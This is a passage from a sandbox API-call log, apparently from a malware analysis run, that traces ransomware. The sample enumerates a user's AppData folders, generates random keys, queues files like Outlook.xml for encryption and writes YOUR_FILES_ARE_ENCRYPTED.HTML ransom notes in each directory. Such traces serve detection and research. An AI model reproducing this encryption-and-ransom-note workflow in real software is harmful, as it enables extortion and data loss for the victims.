lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0165.365] GetFileSizeEx (in: hFile=0x5b8, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=28) returned 1 [0165.365] CloseHandle (hObject=0x5b8) returned 1 [0165.366] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf1d3db40, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf1d3db40, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf1d63ca0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x450, dwReserved0=0x0, dwReserved1=0x60, cFileName="Templates.LNK", cAlternateFileName="TEMPLA~1.LNK")) returned 1 [0165.366] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK") returned 77 [0165.366] lstrcmpW (lpString1="Templates.LNK", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.366] PathFindExtensionW (pszPath="Templates.LNK") returned=".LNK" [0165.366] lstrlenW (lpString=".LNK") returned 4 [0165.366] PathFindExtensionW (pszPath="Templates.LNK") returned=".LNK" [0165.366] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf1d3db40, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf1d3db40, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf1d63ca0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x450, dwReserved0=0x0, dwReserved1=0x60, cFileName="Templates.LNK", cAlternateFileName="TEMPLA~1.LNK")) returned 0 [0165.366] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0165.366] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, 
pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Office\\Recent\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 93 [0165.366] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Office\\Recent\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\office\\recent\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0165.366] WriteFile (in: hFile=0x304, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0165.369] CloseHandle (hObject=0x304) returned 1 [0165.369] GetProcessHeap () returned 0x270000 [0165.370] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0165.370] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf1c59300, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf1d63ca0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf1d63ca0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Recent", cAlternateFileName="")) returned 0 [0165.370] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0165.370] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Office\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 86 [0165.371] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Office\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: 
"c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\office\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5e4 [0165.371] WriteFile (in: hFile=0x5e4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0165.393] CloseHandle (hObject=0x5e4) returned 1 [0165.393] GetProcessHeap () returned 0x270000 [0165.394] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76a0010 | out: hHeap=0x270000) returned 1 [0165.394] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ae8f460, ftCreationTime.dwHighDateTime=0x1d709ba, ftLastAccessTime.dwLowDateTime=0x36540ce0, ftLastAccessTime.dwHighDateTime=0x1d709ba, ftLastWriteTime.dwLowDateTime=0x36540ce0, ftLastWriteTime.dwHighDateTime=0x1d709ba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96478d, dwReserved1=0x0, cFileName="Outlook", cAlternateFileName="")) returned 1 [0165.394] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Outlook") returned 57 [0165.394] GetProcessHeap () returned 0x270000 [0165.394] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x76a0010 [0165.394] lstrcpyW (in: lpString1=0x76a0010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Outlook" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Outlook") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Outlook" [0165.394] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Outlook", lpString2="\\*" | out: 
lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Outlook\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Outlook\\*" [0165.394] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Outlook\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ae8f460, ftCreationTime.dwHighDateTime=0x1d709ba, ftLastAccessTime.dwLowDateTime=0x36540ce0, ftLastAccessTime.dwHighDateTime=0x1d709ba, ftLastWriteTime.dwLowDateTime=0x36540ce0, ftLastWriteTime.dwHighDateTime=0x1d709ba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0165.395] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ae8f460, ftCreationTime.dwHighDateTime=0x1d709ba, ftLastAccessTime.dwLowDateTime=0x36540ce0, ftLastAccessTime.dwHighDateTime=0x1d709ba, ftLastWriteTime.dwLowDateTime=0x36540ce0, ftLastWriteTime.dwHighDateTime=0x1d709ba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.395] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e35fc80, ftCreationTime.dwHighDateTime=0x1d709ba, ftLastAccessTime.dwLowDateTime=0x2e35fc80, ftLastAccessTime.dwHighDateTime=0x1d709ba, ftLastWriteTime.dwLowDateTime=0x823fa4e0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x60, cFileName="Outlook.srs", cAlternateFileName="")) returned 1 [0165.395] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs") returned 69 [0165.395] lstrcmpW 
(lpString1="Outlook.srs", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.395] PathFindExtensionW (pszPath="Outlook.srs") returned=".srs" [0165.395] lstrlenW (lpString=".srs") returned 4 [0165.395] PathFindExtensionW (pszPath="Outlook.srs") returned=".srs" [0165.395] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x36540ce0, ftCreationTime.dwHighDateTime=0x1d709ba, ftLastAccessTime.dwLowDateTime=0x36540ce0, ftLastAccessTime.dwHighDateTime=0x1d709ba, ftLastWriteTime.dwLowDateTime=0x828262d0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x94e, dwReserved0=0x0, dwReserved1=0x60, cFileName="Outlook.xml", cAlternateFileName="")) returned 1 [0165.395] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml") returned 69 [0165.395] lstrcmpW (lpString1="Outlook.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.395] PathFindExtensionW (pszPath="Outlook.xml") returned=".xml" [0165.395] lstrlenW (lpString=".xml") returned 4 [0165.395] PathFindExtensionW (pszPath="Outlook.xml") returned=".xml" [0165.395] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0165.395] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\outlook\\outlook.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x304 [0165.396] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x4ebd504 | out: lpFileSize=0x4ebd504*=2382) returned 1 [0165.396] GetProcessHeap () returned 0x270000 [0165.396] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) 
returned 0x74c2008 [0165.398] wsprintfW (in: param_1=0x4ebd41e, param_2="%02X" | out: param_1="23") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd422, param_2="%02X" | out: param_1="3C") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd426, param_2="%02X" | out: param_1="F7") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd42a, param_2="%02X" | out: param_1="17") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd42e, param_2="%02X" | out: param_1="EF") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd432, param_2="%02X" | out: param_1="7A") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd436, param_2="%02X" | out: param_1="82") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd43a, param_2="%02X" | out: param_1="01") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd43e, param_2="%02X" | out: param_1="B3") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd442, param_2="%02X" | out: param_1="E0") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd446, param_2="%02X" | out: param_1="F4") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd44a, param_2="%02X" | out: param_1="AE") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd44e, param_2="%02X" | out: param_1="20") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd452, param_2="%02X" | out: param_1="CA") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd456, param_2="%02X" | out: param_1="39") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd45a, param_2="%02X" | out: param_1="E9") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd45e, param_2="%02X" | out: param_1="10") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd462, param_2="%02X" | out: param_1="79") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd466, param_2="%02X" | out: param_1="01") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd46a, param_2="%02X" | out: param_1="B2") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd46e, param_2="%02X" | out: param_1="45") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd472, 
param_2="%02X" | out: param_1="5D") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd476, param_2="%02X" | out: param_1="31") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd47a, param_2="%02X" | out: param_1="CC") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd47e, param_2="%02X" | out: param_1="CF") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd482, param_2="%02X" | out: param_1="92") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd486, param_2="%02X" | out: param_1="BA") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd48a, param_2="%02X" | out: param_1="46") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd48e, param_2="%02X" | out: param_1="32") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd492, param_2="%02X" | out: param_1="83") returned 2 [0165.398] wsprintfW (in: param_1=0x4ebd496, param_2="%02X" | out: param_1="3D") returned 2 [0165.399] wsprintfW (in: param_1=0x4ebd49a, param_2="%02X" | out: param_1="16") returned 2 [0165.399] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml" [0165.399] CreateIoCompletionPort (FileHandle=0x304, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0165.399] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0165.399] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x36540ce0, ftCreationTime.dwHighDateTime=0x1d709ba, ftLastAccessTime.dwLowDateTime=0x36540ce0, ftLastAccessTime.dwHighDateTime=0x1d709ba, ftLastWriteTime.dwLowDateTime=0x828262d0, ftLastWriteTime.dwHighDateTime=0x1d7100c, 
nFileSizeHigh=0x0, nFileSizeLow=0x94e, dwReserved0=0x0, dwReserved1=0x60, cFileName="Outlook.xml", cAlternateFileName="")) returned 0 [0165.399] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0165.399] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Outlook\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 87 [0165.400] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Outlook\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\outlook\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5e4 [0165.400] WriteFile (in: hFile=0x5e4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0165.402] CloseHandle (hObject=0x5e4) returned 1 [0165.402] GetProcessHeap () returned 0x270000 [0165.403] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76a0010 | out: hHeap=0x270000) returned 1 [0165.403] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0x7ba80d70, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x7ba80d70, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96478d, dwReserved1=0x0, cFileName="Protect", cAlternateFileName="")) returned 1 [0165.403] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect") returned 57 [0165.403] GetProcessHeap () returned 
0x270000 [0165.403] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x76a0010 [0165.403] lstrcpyW (in: lpString1=0x76a0010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect" [0165.403] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\*" [0165.403] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0x7ba80d70, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x7ba80d70, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0165.404] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0x7ba80d70, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x7ba80d70, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.404] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xd2474dd0, ftCreationTime.dwHighDateTime=0x1d70517, 
ftLastAccessTime.dwLowDateTime=0xd2474dd0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xf8d4cbb0, ftLastWriteTime.dwHighDateTime=0x1d7a942, nFileSizeHigh=0x0, nFileSizeLow=0x1c8, dwReserved0=0x0, dwReserved1=0x60, cFileName="CREDHIST", cAlternateFileName="")) returned 1 [0165.404] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST") returned 66 [0165.404] lstrcmpW (lpString1="CREDHIST", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.404] PathFindExtensionW (pszPath="CREDHIST") returned="" [0165.404] lstrlenW (lpString="") returned 0 [0165.404] PathFindExtensionW (pszPath="CREDHIST") returned="" [0165.404] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x7ba80d70, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0xaf255fc0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaf255fc0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="S-1-5-21-3683305739-1236715609-858405165-1000", cAlternateFileName="S-1-5-~2")) returned 1 [0165.404] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3683305739-1236715609-858405165-1000") returned 103 [0165.404] GetProcessHeap () returned 0x270000 [0165.404] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0165.406] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3683305739-1236715609-858405165-1000" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3683305739-1236715609-858405165-1000") 
returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3683305739-1236715609-858405165-1000" [0165.406] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3683305739-1236715609-858405165-1000", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3683305739-1236715609-858405165-1000\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3683305739-1236715609-858405165-1000\\*" [0165.406] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3683305739-1236715609-858405165-1000\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x7ba80d70, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0xaf255fc0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaf255fc0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0165.406] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x7ba80d70, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0xaf255fc0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaf255fc0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.407] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xaf255fc0, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaf255fc0, ftLastAccessTime.dwHighDateTime=0x1d7e790, 
ftLastWriteTime.dwLowDateTime=0xaf255fc0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0x0, dwReserved1=0x60, cFileName="0ecb71ed-e8f1-413d-8fb0-39e71a22fd7e", cAlternateFileName="0ECB71~1")) returned 1 [0165.407] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3683305739-1236715609-858405165-1000\\0ecb71ed-e8f1-413d-8fb0-39e71a22fd7e") returned 140 [0165.407] lstrcmpW (lpString1="0ecb71ed-e8f1-413d-8fb0-39e71a22fd7e", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.407] PathFindExtensionW (pszPath="0ecb71ed-e8f1-413d-8fb0-39e71a22fd7e") returned="" [0165.407] lstrlenW (lpString="") returned 0 [0165.407] PathFindExtensionW (pszPath="0ecb71ed-e8f1-413d-8fb0-39e71a22fd7e") returned="" [0165.407] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x7bb655b0, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0x7bb655b0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x7bb655b0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0x0, dwReserved1=0x60, cFileName="f726565b-c258-4186-bdea-9605cc34c22b", cAlternateFileName="F72656~1")) returned 1 [0165.407] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3683305739-1236715609-858405165-1000\\f726565b-c258-4186-bdea-9605cc34c22b") returned 140 [0165.407] lstrcmpW (lpString1="f726565b-c258-4186-bdea-9605cc34c22b", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.407] PathFindExtensionW (pszPath="f726565b-c258-4186-bdea-9605cc34c22b") returned="" [0165.407] lstrlenW (lpString="") returned 0 [0165.407] PathFindExtensionW 
(pszPath="f726565b-c258-4186-bdea-9605cc34c22b") returned="" [0165.407] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x7bbd79d0, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0x7bbd79d0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0xaf2c83e0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x60, cFileName="Preferred", cAlternateFileName="PREFER~1")) returned 1 [0165.407] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3683305739-1236715609-858405165-1000\\Preferred") returned 113 [0165.407] lstrcmpW (lpString1="Preferred", 